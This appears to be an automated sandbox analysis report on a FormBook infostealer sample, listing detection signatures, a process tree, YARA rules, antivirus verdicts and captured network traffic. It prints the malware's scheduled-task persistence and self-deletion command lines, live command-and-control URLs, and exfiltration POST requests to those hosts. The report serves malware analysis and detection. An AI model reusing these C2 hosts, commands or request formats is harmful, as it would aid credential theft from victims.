Analysis Report CN03716-20.exe

Overview

General Information

Sample Name: CN03716-20.exe
Analysis ID: 288109
MD5: b29ab9daeda57a7b9494bf50e37b556c
SHA1: c97d6f7ebda204b6411a00e8fb3b4fd80e62cc33
SHA256: 9cd82d6a35b48112a4e99f0cbdbd3a18df7738082d7f40f24274debfc5688ec4
Tags: exe, FormBook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • CN03716-20.exe (PID: 5260 cmdline: 'C:\Users\user\Desktop\CN03716-20.exe' MD5: B29AB9DAEDA57A7B9494BF50E37B556C)
    • schtasks.exe (PID: 5172 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\QZblaErkmXlkhK' /XML 'C:\Users\user\AppData\Local\Temp\tmpA242.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • CN03716-20.exe (PID: 4356 cmdline: C:\Users\user\Desktop\CN03716-20.exe MD5: B29AB9DAEDA57A7B9494BF50E37B556C)
      • explorer.exe (PID: 3368 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6584 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6872 cmdline: /c del 'C:\Users\user\Desktop\CN03716-20.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • srmdufw81bmhwhwh.exe (PID: 4956 cmdline: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe MD5: B29AB9DAEDA57A7B9494BF50E37B556C)
          • schtasks.exe (PID: 6372 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\QZblaErkmXlkhK' /XML 'C:\Users\user\AppData\Local\Temp\tmp2A88.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • srmdufw81bmhwhwh.exe (PID: 6420 cmdline: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe MD5: B29AB9DAEDA57A7B9494BF50E37B556C)
          • srmdufw81bmhwhwh.exe (PID: 6408 cmdline: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe MD5: B29AB9DAEDA57A7B9494BF50E37B556C)
        • cmstp.exe (PID: 1548 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000001A.00000002.504807087.00000000033F9000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18349:$sqlite3step: 68 34 1C 7B E1
  • 0x1845c:$sqlite3step: 68 34 1C 7B E1
  • 0x18378:$sqlite3text: 68 38 2A 90 C5
  • 0x1849d:$sqlite3text: 68 38 2A 90 C5
  • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18349:$sqlite3step: 68 34 1C 7B E1
  • 0x1845c:$sqlite3step: 68 34 1C 7B E1
  • 0x18378:$sqlite3text: 68 38 2A 90 C5
  • 0x1849d:$sqlite3text: 68 38 2A 90 C5
  • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
30.2.srmdufw81bmhwhwh.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
30.2.srmdufw81bmhwhwh.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\QZblaErkmXlkhK' /XML 'C:\Users\user\AppData\Local\Temp\tmpA242.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\QZblaErkmXlkhK' /XML 'C:\Users\user\AppData\Local\Temp\tmpA242.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\CN03716-20.exe', ParentImage: C:\Users\user\Desktop\CN03716-20.exe, ParentProcessId: 5260, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\QZblaErkmXlkhK' /XML 'C:\Users\user\AppData\Local\Temp\tmpA242.tmp', ProcessId: 5172

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: CN03716-20.exe | Avira: detected
Antivirus detection for URL or domain
Source: http://www.esanjor.online/cmg/?M694-=yVIXBz1P&BB=CmTltWFTvy3EJlg4TEqBBLn9+8OjC9fpBSds7xERVBMYuIjPQpcJ/EVqARb7a9JaL//732yiKA== | Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exe | Avira: detection malicious, Label: TR/AD.Swotter.iznqo
Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe | Avira: detection malicious, Label: TR/AD.Swotter.iznqo
Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe | Avira: detection malicious, Label: TR/AD.Swotter.iznqo
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe | Virustotal: Detection: 27%
Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe | Metadefender: Detection: 13%
Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe | ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\Iw6qlizi\srmdufw81bmhwhwh.exe | Virustotal: Detection: 27%
Source: C:\Users\user\AppData\Local\Temp\Iw6qlizi\srmdufw81bmhwhwh.exe | Metadefender: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\Iw6qlizi\srmdufw81bmhwhwh.exe | ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exe | Virustotal: Detection: 27%
Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exe | Metadefender: Detection: 13%
Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exe | ReversingLabs: Detection: 31%
Multi AV Scanner detection for submitted file
Source: CN03716-20.exe | Virustotal: Detection: 27%
Source: CN03716-20.exe | Metadefender: Detection: 13%
Source: CN03716-20.exe | ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match | File source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: CN03716-20.exe | Joe Sandbox ML: detected
Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.CN03716-20.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: global traffic | HTTP traffic detected: GET /cmg/?M694-=yVIXBz1P&BB=CmTltWFTvy3EJlg4TEqBBLn9+8OjC9fpBSds7xERVBMYuIjPQpcJ/EVqARb7a9JaL//732yiKA== HTTP/1.1 | Host: www.esanjor.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /cmg/?BB=5/1mjjR4mGjOAvq4NnaV6etpsB6KL9PtiQNF/4xJREY1Y/y+fGAvCK0i83oyWJ1COzWQaYhpTQ==&M694-=yVIXBz1P HTTP/1.1 | Host: www.lifecoachwoman.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 35.242.251.130
Source: Joe Sandbox View | IP Address: 52.0.217.44
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
            Source: global trafficHTTP traffic detected: POST /cmg/ HTTP/1.1Host: www.lifecoachwoman.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.lifecoachwoman.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lifecoachwoman.com/cmg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 42 3d 78 64 35 63 39 48 78 33 34 30 50 78 5a 66 71 32 62 67 48 4a 76 5a 77 48 37 7a 4b 4e 63 4f 6a 47 6d 33 6b 67 38 72 64 5f 63 78 73 57 58 73 6d 79 64 6d 39 47 45 61 67 68 38 55 34 4b 51 61 59 52 45 44 69 64 61 35 46 41 61 6f 38 65 75 43 51 5a 4c 44 72 52 39 41 62 59 6e 67 36 50 38 54 58 34 43 71 4b 74 52 72 47 5a 63 64 38 30 41 7a 74 62 70 49 42 62 6c 71 57 49 50 47 48 4f 56 43 36 57 4a 56 50 5f 53 37 31 43 65 64 71 63 48 5f 6a 34 64 39 68 79 45 63 56 44 55 64 52 64 41 2d 70 70 6d 73 77 6a 74 4c 52 65 58 5f 6f 74 42 78 4c 79 71 4f 77 75 56 74 38 58 37 74 33 4a 6a 4c 7e 4a 61 55 43 46 74 65 69 46 34 71 28 5f 6b 77 46 56 6d 49 4a 57 39 36 7a 35 57 48 4e 53 53 54 6a 48 55 55 36 47 6d 39 66 63 4d 65 32 71 52 4d 70 73 4c 71 59 54 61 4a 37 64 71 50 30 59 4b 36 42 78 6b 67 75 66 43 73 46 4c 74 32 73 58 28 77 32 4a 4f 67 53 6e 77 34 72 53 66 51 75 65 31 35 35 38 64 49 46 48 67 4c 32 67 6f 67 41 4b 58 50 4c 66 6a 70 78 50 37 31 6b 4f 75 6c 6c 71 49 38 35 67 45 61 45 6a 39 62 72 34 36 66 6e 70 4a 4e 4b 70 28 36 58 53 7e 4f 6a 4d 4f 46 54 5f 46 2d 6e 65 35 4a 70 44 78 45 43 39 39 68 6b 4b 41 6e 56 45 50 37 6c 68 78 5a 51 59 50 56 39 54 46 77 56 38 32 43 6e 37 36 5a 39 39 63 68 6a 54 57 75 42 74 65 6f 51 73 73 54 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: 
BB=xd5c9Hx340PxZfq2bgHJvZwH7zKNcOjGm3kg8rd_cxsWXsmydm9GEagh8U4KQaYREDida5FAao8euCQZLDrR9AbYng6P8TX4CqKtRrGZcd80AztbpIBblqWIPGHOVC6WJVP_S71CedqcH_j4d9hyEcVDUdRdA-ppmswjtLReX_otBxLyqOwuVt8X7t3JjL~JaUCFteiF4q(_kwFVmIJW96z5WHNSSTjHUU6Gm9fcMe2qRMpsLqYTaJ7dqP0YK6BxkgufCsFLt2sX(w2JOgSnw4rSfQue1558dIFHgL2gogAKXPLfjpxP71kOullqI85gEaEj9br46fnpJNKp(6XS~OjMOFT_F-ne5JpDxEC99hkKAnVEP7lhxZQYPV9TFwV82Cn76Z99chjTWuBteoQssTo.
            Source: global trafficHTTP traffic detected: POST /cmg/ HTTP/1.1Host: www.lifecoachwoman.comConnection: closeContent-Length: 165896Cache-Control: no-cacheOrigin: http://www.lifecoachwoman.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lifecoachwoman.com/cmg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 42 3d 78 64 35 63 39 44 74 6b 36 6b 4c 67 64 74 4f 31 61 77 58 52 6c 35 42 49 71 45 53 67 4d 70 58 30 34 30 67 77 38 72 42 7a 51 55 77 45 64 73 57 79 66 6b 46 42 51 4b 67 67 6f 6b 34 4a 55 61 56 6f 59 69 47 6a 61 34 52 6d 61 6f 45 5a 67 6b 30 63 49 54 72 47 38 67 58 53 68 67 65 59 38 57 66 6e 43 4f 75 31 55 72 4b 5a 54 4a 70 79 4d 79 39 4d 75 4a 4e 49 6d 61 62 41 63 79 61 65 56 79 57 45 49 33 7a 6e 62 61 70 41 63 65 32 54 62 4b 72 41 58 4e 5a 70 4b 73 41 4c 59 2d 74 43 46 64 63 42 79 4a 52 44 69 70 70 64 49 66 77 6a 47 32 33 4d 76 5f 45 58 46 74 74 75 37 71 72 34 75 64 47 55 65 55 75 4e 76 76 66 51 7a 37 37 35 68 7a 63 49 73 75 39 6e 37 36 44 47 4a 54 41 41 42 54 4f 48 41 33 54 4e 35 50 76 33 4f 76 36 6d 61 64 31 55 4b 64 34 62 57 70 4b 50 67 73 56 41 45 4f 78 35 77 44 43 74 61 73 46 67 67 57 74 46 6e 79 65 78 65 54 7e 38 6e 74 6a 37 55 7a 4f 4f 74 49 45 69 61 4e 5a 78 39 35 4c 47 71 52 67 65 64 72 6e 6e 6e 4b 39 2d 38 43 55 69 77 31 6c 4e 49 34 41 75 45 61 46 53 39 61 71 58 37 72 50 70 4b 38 72 7a 72 34 28 67 70 65 6a 52 4d 56 44 35 50 70 48 77 35 49 4e 44 6a 68 7e 58 76 6e 6b 4b 58 45 39 48 4f 65 52 68 79 70 51 59 44 31 38 79 4e 53 64 7a 37 32 72 64 7a 37 56 66 62 53 66 38 64 75 5a 41 61 36 70 73 36 55 76 34 6e 36 33 78 28 2d 49 34 64 4e 71 66 6b 37 56 6e 38 49 57 46 4a 30 34 71 45 41 33 73 39 64 69 78 65 39 35 6e 7a 6b 57 55 30 5a 39 59 7a 31 4c 45 55 34 69 72 57 34 79 65 42 6c 68 7a 4a 36 76 69 4c 36 44 37 67 71 73 53 47 67 71 6a 46 30 4e 71 73 54 75 30 43 43 6f 49 4a 4b 43 47 35 64 74 65 48 49 4a 33 61 75 33 30 6c 
77 57 34 4d 53 61 35 43 32 43 43 6e 45 49 32 43 53 4e 34 34 6b 46 65 77 65 32 4e 54 47 56 73 48 65 7e 63 6f 4a 6e 4e 50 38 52 64 68 51 48 48 54 78 72 6b 48 76 61 61 79 64 6f 35 4e 41 76 2d 35 51 44 4e 48 33 34 59 36 61 32 56 69 43 57 4e 4e 42 6d 73 73 4f 66 35 55 5f 50 39 58 41 4b 54 53 39 61 50 76 36 43 42 64 44 6d 62 4e 66 4c 77 67 6d 71 44 4b 41 4f 65 36 6c 49 35 6c 41 46 67 72 6f 55 64 41 38 71 39 76 51 6d 45 63 46 4c 79 4a 71 58 6c 7e 4a 52 34 52 53 51 72 47 66 67 32 48 4b 75 4d 39 73 7a 66 6e 5f 75 33 58 5a 4f 50 74 43 6e 4d 59 33 30 54 55 34 4b 50 4c 6b 59 64 6e 59 72 44 4f 4f 4e 7a 46 59 32 35 51 41 73 45 6b 52 6a 75 54 55 4f 54 43 2d 44 41 77 61 70 43 6f 46 30 50 48 37 39 6f 4d 43 77 73 58 39 4c 5f 66 70 59 37 31 72 4e 6e 79 74 46 61 57 73 74 4c 55 4f 28 52 4e 36 7a 62 4a 63 43 4e 54 41 6a 47 46 52 42 42 57 56 38 53 65 36 58 66 4d 6e 4a 4e 4d 53 65 5a 71 41 62 62 4c 30 43 66 65 6d 4c 46 6e 6c 6b 4e 76 67 50 31 35 70 4c 44 48 39 72 6a 42 67 51 52 67 62 64 67 57 47 28 61 51 33 4a 48 34 43 50 39 51 52 34 71 30 7
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Sep 2020 14:47:30 GMTConnection: closeContent-Length: 485Content-Encoding: gzipX-Frame-Options: SAMEORIGINCache-Control: private, no-cache, no-store, max-age=0Expires: Mon, 01 Jan 1990 0:00:00 GMTData Raw: 1f 8b 08 00 00 00 00 00 00 00 95 52 d1 6e d3 30 14 7d ef 57 78 46 e2 85 3a 4e 69 d1 46 9b 04 89 76 12 93 06 9b 46 10 e2 09 39 c9 4d e2 cd b1 83 7d 9b ac 7f 8f 93 54 5b b5 3d 20 9e ac 7b ee 39 c7 be c7 37 3a db dd 6c d3 5f b7 97 e4 4b fa f5 9a dc fe f8 7c 7d b5 25 94 71 fe 73 b9 e5 7c 97 ee a6 c6 2a 08 17 24 b5 42 3b 89 d2 68 a1 38 bf fc 46 09 ad 11 db 35 e7 7d df 07 fd 32 30 b6 e2 e9 1d af b1 51 2b ae 8c 71 10 14 58 d0 64 16 0d 10 79 6c 94 76 eb 32 8b 4f 65 a5 c8 21 33 e6 21 c8 4d c3 df 87 e1 05 2f b3 46 d1 23 d9 54 4f 64 53 b5 41 03 5c bb 37 a3 21 88 c2 1f 0d a0 20 03 81 c1 9f bd ec 62 ba 35 1a 41 23 4b 0f 2d 50 92 4f 55 4c 11 1e 71 7c d7 86 e4 b5 b0 0e 30 de 63 c9 2e 68 32 59 68 d1 40 4c 3b 09 7d 6b 2c 9e 08 7b 59 60 1d 17 d0 c9 1c d8 58 cc 89 d4 3e 04 a1 98 cb 85 82 78 31 27 7b 07 76 ac 44 e6 01 6d 88 ab ad d4 0f 0c 0d 2b 25 7a c0 5f 83 12 15 24 6f 75 e6 da 4d c4 a7 2a 52 9e 45 6a 0b e5 d3 94 32 c8 0b dd 0a 3b e5 81 35 34 e0 b8 85 4a 3a b4 c2 f2 f3 8f 8b 45 f8 21 c8 9d a3 c4 82 8a a9 c3 83 02 57 03 20 7d 65 e7 bc 5f e9 07 71 41 65 4c a5 40 b4 d2 8d b6 5e fe a9 14 8d 54 87 f8 a6 05 fd ee bb ff d7 f5 2a 0c e7 e7 61 f8 da 97 a0 cf f2 18 e1 70 71 12 f1 63 fa 99 29 0e 49 e4 72 2b 5b 3c 65 dd 8b 4e 4c a8 27 9f 31 36 eb 84 25 f9 90 31 89 09 9d 66 a0 9b 01 94 85 4f 59 96 12 ec d0 a1 9b 19 63 de 7e d2 fe c3 99 38 9b c7 f4 65 62 cf 51 75 4b bf 82 a2 00 1b dc 8f 6f fe 1f d3 ba fd 3d 01 2f b4 7c 9a 78 dc a4 64 f6 17 4c d4 8a 78 3d 03 00 00 Data Ascii: Rn0}WxF:NiFvF9M}T[= {97:l_K|}%qs|*$B;h8F5}20Q+qXdylv2Oe!3!M/F#TOdSA\7! b5A#K-POULq|0c.h2Yh@L;}k,{Y`X>x1'{vDm+%z_$ouM*REj2;54J:E!W }e_qAeL@^T*apqc)Ir+[<eNL'16%1fOYc~8ebQuKo=/|xdLx=
Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmp | String found in binary or memory: <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#"> equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: cdn.onenote.net
            Source: unknownHTTP traffic detected: POST /cmg/ HTTP/1.1Host: www.lifecoachwoman.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.lifecoachwoman.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lifecoachwoman.com/cmg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 42 3d 78 64 35 63 39 48 78 33 34 30 50 78 5a 66 71 32 62 67 48 4a 76 5a 77 48 37 7a 4b 4e 63 4f 6a 47 6d 33 6b 67 38 72 64 5f 63 78 73 57 58 73 6d 79 64 6d 39 47 45 61 67 68 38 55 34 4b 51 61 59 52 45 44 69 64 61 35 46 41 61 6f 38 65 75 43 51 5a 4c 44 72 52 39 41 62 59 6e 67 36 50 38 54 58 34 43 71 4b 74 52 72 47 5a 63 64 38 30 41 7a 74 62 70 49 42 62 6c 71 57 49 50 47 48 4f 56 43 36 57 4a 56 50 5f 53 37 31 43 65 64 71 63 48 5f 6a 34 64 39 68 79 45 63 56 44 55 64 52 64 41 2d 70 70 6d 73 77 6a 74 4c 52 65 58 5f 6f 74 42 78 4c 79 71 4f 77 75 56 74 38 58 37 74 33 4a 6a 4c 7e 4a 61 55 43 46 74 65 69 46 34 71 28 5f 6b 77 46 56 6d 49 4a 57 39 36 7a 35 57 48 4e 53 53 54 6a 48 55 55 36 47 6d 39 66 63 4d 65 32 71 52 4d 70 73 4c 71 59 54 61 4a 37 64 71 50 30 59 4b 36 42 78 6b 67 75 66 43 73 46 4c 74 32 73 58 28 77 32 4a 4f 67 53 6e 77 34 72 53 66 51 75 65 31 35 35 38 64 49 46 48 67 4c 32 67 6f 67 41 4b 58 50 4c 66 6a 70 78 50 37 31 6b 4f 75 6c 6c 71 49 38 35 67 45 61 45 6a 39 62 72 34 36 66 6e 70 4a 4e 4b 70 28 36 58 53 7e 4f 6a 4d 4f 46 54 5f 46 2d 6e 65 35 4a 70 44 78 45 43 39 39 68 6b 4b 41 6e 56 45 50 37 6c 68 78 5a 51 59 50 56 39 54 46 77 56 38 32 43 6e 37 36 5a 39 39 63 68 6a 54 57 75 42 74 65 6f 51 73 73 54 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: 
BB=xd5c9Hx340PxZfq2bgHJvZwH7zKNcOjGm3kg8rd_cxsWXsmydm9GEagh8U4KQaYREDida5FAao8euCQZLDrR9AbYng6P8TX4CqKtRrGZcd80AztbpIBblqWIPGHOVC6WJVP_S71CedqcH_j4d9hyEcVDUdRdA-ppmswjtLReX_otBxLyqOwuVt8X7t3JjL~JaUCFteiF4q(_kwFVmIJW96z5WHNSSTjHUU6Gm9fcMe2qRMpsLqYTaJ7dqP0YK6BxkgufCsFLt2sX(w2JOgSnw4rSfQue1558dIFHgL2gogAKXPLfjpxP71kOullqI85gEaEj9br46fnpJNKp(6XS~OjMOFT_F-ne5JpDxEC99hkKAnVEP7lhxZQYPV9TFwV82Cn76Z99chjTWuBteoQssTo.
